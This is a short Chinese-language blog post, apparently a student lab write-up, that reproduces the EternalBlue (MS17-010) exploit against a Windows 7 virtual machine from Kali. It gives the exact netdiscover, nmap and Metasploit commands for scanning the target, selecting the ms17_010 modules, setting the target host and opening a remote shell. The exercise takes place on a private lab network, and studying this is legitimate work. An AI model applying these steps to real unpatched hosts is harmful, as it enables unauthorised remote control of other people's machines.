复现环境:
Kali、windows7x64虚拟机
win7虚拟机镜像迅雷下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
打开Kali扫描同网段IP:
netdiscover -r 192.168.38.0/24
然后用nmap对win7ip进行操作系统等信息进行扫描,看看其445端口是否打开,是否为64位操作系统。
nmap -O 192.168.38.133
也可以直接打开msfconsole:
搜索永恒之蓝模块: search ms17_010
search ms17_010
我们这里使用第三个模块,目的是扫描win7系统是否存在该漏洞
use 3
set rhosts 192.168.38.133
run
如图所示则说明该漏洞可以被我们所利用,第一个扫描环节结束,下面开始漏洞利用的环节
同样的步骤,另外开一个命令终端,打开msfconsole,然后search ms17_010,然后use 0,使用第0个模块,show options , set rhosts 192.168.38.133
run之后如果成功就可以看见有个WIN的标识:
拿shell的指令:
shell
输入ipconfig查看win7的IP地址:
到这里本次漏洞复现就完成了,因为太多人都复现这个漏洞,导致交作业的时候被老师骂了,都做完了总不能删了吧,那就发篇博客吧。下次发表CVE-2019-0232的详细复现过程